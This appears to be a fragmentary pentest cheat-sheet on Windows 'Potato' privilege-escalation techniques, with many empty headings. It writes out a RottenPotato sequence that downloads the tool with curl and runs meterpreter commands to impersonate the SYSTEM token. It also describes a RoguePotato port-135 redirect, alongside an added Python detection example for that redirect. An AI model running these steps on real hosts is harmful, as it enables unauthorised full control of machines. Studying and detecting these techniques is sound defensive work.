Potatoes

RottenPotato

$ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
meterpreter > upload r.exe
meterpreter > load incognito
meterpreter > execute -cH -f r.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

LonelyPotato

JuicyPotato

RoguePotato

Redirect traffic arriving on port 135 of the Attacker (10.10.13.37) back to the Victim (192.168.1.11) on port 9999 with socat (RogueOxidResolver is running locally on port 9999 on the Victim):

Trigger the potato to run a binary with high privileges (don't forget to start a listener if sending a reverse shell):
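
Seen from the network, the port 135 redirect described in this section shows up as a host calling out to port 135 on a remote address that then connects straight back to that host, the reverse of a normal RPC exchange, where the client opens both connections. The following is an added detection example (not part of the original notes) that flags that pair in constructed flow records; the record layout, the 5-second window and the function name are assumptions.

```python
from datetime import datetime, timedelta

# Constructed flow records: (start time, source, destination, destination port).
# The first two use the Attacker/Victim addresses from the notes above.
FLOWS = [
    ("2024-01-01T10:00:00", "192.168.1.11", "10.10.13.37", 135),
    ("2024-01-01T10:00:01", "10.10.13.37", "192.168.1.11", 9999),
    ("2024-01-01T10:05:00", "192.168.1.20", "192.168.1.5", 135),   # ordinary RPC, no bounce
    ("2024-01-01T10:07:00", "10.10.13.37", "192.168.1.30", 445),   # unrelated inbound
    ("2024-01-01T11:00:00", "192.168.1.40", "10.10.13.50", 135),
    ("2024-01-01T11:10:00", "10.10.13.50", "192.168.1.40", 9999),  # outside the window
]

WINDOW = timedelta(seconds=5)  # assumed correlation window, tune per environment


def find_rpc_bounces(flows, window=WINDOW):
    """Return (host, remote, return_port) for every case where `host`
    connected to remote:135 and `remote` connected back to `host`
    within `window`."""
    parsed = sorted((datetime.fromisoformat(t), s, d, p) for t, s, d, p in flows)
    pending = {}  # (host, remote) -> time of the last outbound 135 connection
    hits = []
    for ts, src, dst, port in parsed:
        if port == 135:
            pending[(src, dst)] = ts
            continue
        # Is this flow the remote side answering an earlier 135 call?
        started = pending.get((dst, src))
        if started is not None and ts - started <= window:
            hits.append((dst, src, port))
    return hits


if __name__ == "__main__":
    for host, remote, port in find_rpc_bounces(FLOWS):
        print(f"{host} called {remote}:135, {remote} connected back on port {port}")
```

Outbound port 135 to an address outside the organisation is rarely legitimate on its own, so blocking it at the perimeter removes the precondition this check looks for.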

RemotePotato0

Get the session ID of the user to pwn:

Hashes collector (modes 2, 3):

Cross-protocol relay (modes 0, 1):

Combining with ESC8:

GenericPotato

EfsPotato

Tools

SweetPotato

MultiPotato
